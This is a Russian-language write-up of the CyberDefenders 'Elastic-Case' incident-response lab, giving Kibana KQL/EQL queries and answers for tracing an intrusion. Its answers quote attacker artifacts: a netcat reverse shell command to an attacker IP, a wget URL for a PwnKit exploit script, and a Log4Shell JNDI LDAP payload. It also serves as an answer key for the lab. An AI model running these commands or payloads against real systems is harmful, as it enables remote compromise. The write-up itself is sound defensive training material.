10 подписчиков

[CyberDefenders] Elastic-Case

4 марта 20234 мар 2023

3 мин

Добрый день. Сегодня у нас решение лабораторной работе на базе ELK стэка Elastic-Case, Category : Incident response - https://cyberdefenders.org/blueteam-ctf-challenges/90#nav-questions Для поиска необходимых событий будут использованы KQL (Kibana Query Language - это там, где пустая строка, и туда надо что-то вписыать. И EQL (Elastic Query Language) - это панелька чуть ниже, где фильтры показаны определенными плитками. KQL: *.*.* EQL: file.name: exists Answer: ahmed 2. What is the hostname he was using? KQL: *.*.* EQL: file.name: exists Answer: DESKTOP-Q1SL9P2 3. What is the name of the malicious file? KQL: *.*.* EQL: file.name: exists Answer: Acount_details.pdf.exe 4. What is the attacker's IP address? EQL: process.name: Acount_details.pdf.exe, source.ip:exists Answer: 192.168.1.10 5. Another user with high privilege runs the same malicious file. What is the username? EQL: process.name: Acount_details.pdf.exe, source.ip:exists, not user.name: ahmed Answer: Cybery 6. The attacker was

Добрый день. Сегодня у нас решение лабораторной работе на базе ELK стэка Elastic-Case, Category : Incident response - https://cyberdefenders.org/blueteam-ctf-challenges/90#nav-questions

Для поиска необходимых событий будут использованы KQL (Kibana Query Language - это там, где пустая строка, и туда надо что-то вписыать. И EQL (Elastic Query Language) - это панелька чуть ниже, где фильтры показаны определенными плитками.

Who downloads the malicious file which has a double extension?

KQL: *.*.*

EQL: file.name: exists

Answer: ahmed

2. What is the hostname he was using?

KQL: *.*.*

EQL: file.name: exists

Answer: DESKTOP-Q1SL9P2

3. What is the name of the malicious file?

KQL: *.*.*

EQL: file.name: exists

Answer: Acount_details.pdf.exe

4. What is the attacker's IP address?

EQL: process.name: Acount_details.pdf.exe, source.ip:exists

Answer: 192.168.1.10

5. Another user with high privilege runs the same malicious file. What is the username?

EQL: process.name: Acount_details.pdf.exe, source.ip:exists, not user.name: ahmed

Answer: Cybery

6. The attacker was able to upload a DLL file of size 8704. What is the file name?

KQL:*.dll

EQL: file.size: exist, file.size:8, 704

Answer: mCblHDgWP.dll

7. What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?

KQL: 10716

Answer: rundll32.exe

8. The previous process was able to access a registry. What is the full path of the registry?

EQL: process.name: rundll32.exe, registry.path: exists

Answer: HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled

9. PowerShell process with pid 8836 changed a file in the system. What was that filename?

EQL: process.name: powershell.exe, file.path:exists, proces.pid: 8836, event.action: overwrite

Answer: ModuleAnalysisCache

10. PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?

EQL: process.name: powershell.exe, process.pid: 11676, event.action:creation

Answer: __PSScriptPolicyTest_bymwxuft.3b5.ps1

11. What is the machine's IP address that is in the same LAN as a windows machine?

KQL: 192.168.10.10

EQL: host.os: windows, host.os.platform: windows

Answer: 192.168.10.30

12. The attacker login to the Ubuntu machine after a brute force attack. What is the username he was successfully login with?

KQL: ubuntu and login

EQL: event.type: start, event.type: authentification_success

Answer: Salem

13. After that attacker downloaded the exploit from the GitHub repo using wget. What is the full URL of the repo?

KQL: wget

EQL: process.args: exists

Answer: https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py

14. After The attacker runs the exploit, which spawns a new process called pkexec, what is the process's md5 hash?

EQL: process.name: pkexec, process.hash.md5: exists

Answer: 3a4ad518e9e404a6bad3d39dfebaf2f6

15. Then attacker gets an interactive shell by running a specific command on the process id 3011 with the root user. What is the command?

EQL: process.command_line: exists, user.name: root, process.parent.pid: 3011

Answer: bash -i

16. What is the hostname which alert signal.rule.name: "Netcat Network Activity"?

Так как индекса sugnal.rule.name нет в индекс паттернах, зайдем во вкладку на боковой панели Security -> Alerts

Answer: CentOS

17. What is the username who ran netcat?

Answer: solr

18. What is the parent process name of netcat?

KQL: nc

nc - для вызова netcat в терминале, редко кто из сотрудников пишет полностью netcat

Answer: Java

19. If you focus on nc process, you can get the entire command that the attacker ran to get a reverse shell. Write the full command?

KQL: nc

Answer: nc -e /bin/bash 192.168.1.10 9999

20. From the previous three questions, you may remember a famous java vulnerability. What is it?

Вы можете вспомнить, что это уязвимость Log4Shell, ну или попросту загуглите. Да, так тоже можно

Answer: Log4Shell

21. What is the entire log file path of the "solr" application?

KQL: solr

EQL: user.name: solr, file.path: exists

Answer: /var/solr/logs/solr.log

22. What is the path that is vulnerable to log4j?

KQL: *jndi*

Данный скрин и фильтр подходит для решения 22, 23 и 24 вопросов лабораторки

Answer: /admin/cores

23. What is the GET request parameter used to deliver log4j payload?

Answer: foo

24. What is the JNDI payload that is connected to the LDAP port?

Answer: {foo=${jndi:ldap://192.168.1.10:1389/Exploit}}